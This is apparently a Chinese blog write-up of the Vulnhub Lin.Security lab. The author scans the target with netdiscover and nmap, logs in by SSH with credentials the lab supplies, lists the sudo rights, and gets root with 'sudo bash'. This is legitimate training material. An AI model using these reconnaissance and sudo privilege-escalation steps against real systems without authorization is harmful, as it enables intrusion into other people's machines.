Lin.Security
靶机地址:http://www.vulnhub.com/entry/linsecurity-1,244/
由于靶机的作者直接给出了ssh用户名和密码,本题非常简单
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.165.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:8c:bf:0a 1 60 PCS Systemtechnik GmbH
192.168.56.144 08:00:27:d8:9f:d6 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.144
NMAP扫描
─$ sudo nmap -sS -sV -sC -p- 192.168.56.144 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-31 08:56 EDT
Nmap scan report for bogon (192.168.56.144)
Host is up (0.00014s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 7a:9b:b9:32:6f:95:77:10:c0:a0:80:35:34:b1:c0:00 (RSA)
| 256 24:0c:7a:82:78:18:2d:66:46:3b:1a:36:22:06:e1:a1 (ECDSA)
|_ 256 b9:15:59:78:85:78:9e:a5:e6:16:f6:cf:96:2d:1d:36 (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 42673/tcp6 mountd
| 100005 1,2,3 43901/tcp mountd
| 100005 1,2,3 48518/udp6 mountd
| 100005 1,2,3 58572/udp mountd
| 100021 1,3,4 32885/tcp6 nlockmgr
| 100021 1,3,4 35243/udp nlockmgr
| 100021 1,3,4 40811/tcp nlockmgr
| 100021 1,3,4 58273/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
40811/tcp open nlockmgr 1-4 (RPC #100021)
43901/tcp open mountd 1-3 (RPC #100005)
52643/tcp open mountd 1-3 (RPC #100005)
57903/tcp open mountd 1-3 (RPC #100005)
MAC Address: 08:00:27:D8:9F:D6 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds
从NMAP扫描结果可以看到2049开放,NSF共享
Root提权
“To get started you can log onto the host with the credentials: bob/secret“
因为题目本身给出了用户名和密码:bob/secret,因此可以直接用ssh登录
┌──(kali㉿kali)-[~/Vulnhub/Lin_Security]
└─$ ssh [email protected]
[email protected]'s password:
██╗ ██╗███╗ ██╗ ███████╗███████╗ ██████╗██╗ ██╗██████╗ ██╗████████╗██╗ ██╗
██║ ██║████╗ ██║ ██╔════╝██╔════╝██╔════╝██║ ██║██╔══██╗██║╚══██╔══╝╚██╗ ██╔╝
██║ ██║██╔██╗ ██║ ███████╗█████╗ ██║ ██║ ██║██████╔╝██║ ██║ ╚████╔╝
██║ ██║██║╚██╗██║ ╚════██║██╔══╝ ██║ ██║ ██║██╔══██╗██║ ██║ ╚██╔╝
███████╗██║██║ ╚████║██╗███████║███████╗╚██████╗╚██████╔╝██║ ██║██║ ██║ ██║
╚══════╝╚═╝╚═╝ ╚═══╝╚═╝╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝
Welcome to lin.security | https://in.security | version 1.0
bob@linsecurity:~$ id
uid=1000(bob) gid=1004(bob) groups=1004(bob)
bob@linsecurity:~$ sudo -l
[sudo] password for bob:
Matching Defaults entries for bob on linsecurity:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User bob may run the following commands on linsecurity:
(ALL) /bin/ash, /usr/bin/awk, /bin/bash, /bin/sh, /bin/csh,
/usr/bin/curl, /bin/dash, /bin/ed, /usr/bin/env, /usr/bin/expect,
/usr/bin/find, /usr/bin/ftp, /usr/bin/less, /usr/bin/man, /bin/more,
/usr/bin/scp, /usr/bin/socat, /usr/bin/ssh, /usr/bin/vi,
/usr/bin/zsh, /usr/bin/pico, /usr/bin/rvim, /usr/bin/perl,
/usr/bin/tclsh, /usr/bin/git, /usr/bin/script, /usr/bin/scp
bob@linsecurity:~$ sudo bash
root@linsecurity:~# id
uid=0(root) gid=0(root) groups=0(root)
root@linsecurity:~# cd /root
root@linsecurity:/root# ls -alh
total 32K
drwx------ 6 root root 4.0K Jul 11 2018 .
drwxr-xr-x 23 root root 4.0K Jul 10 2018 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Jul 10 2018 .cache
-rw-r--r-- 1 root root 0 Jul 10 2018 .cloud-locale-test.skip
drwx------ 3 root root 4.0K Jul 10 2018 .gnupg
drwxr-xr-x 3 root root 4.0K Jul 9 2018 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4.0K Jul 9 2018 .ssh
root@linsecurity:/root#
这个靶机非常简单,只试了其中/bin/bash,因为还有很多其他的命令用于sudo提权。
标签:bin,Lin,tcp,2049,Vulnhub,Security,root,bob,usr From: https://www.cnblogs.com/jason-huawen/p/16845880.html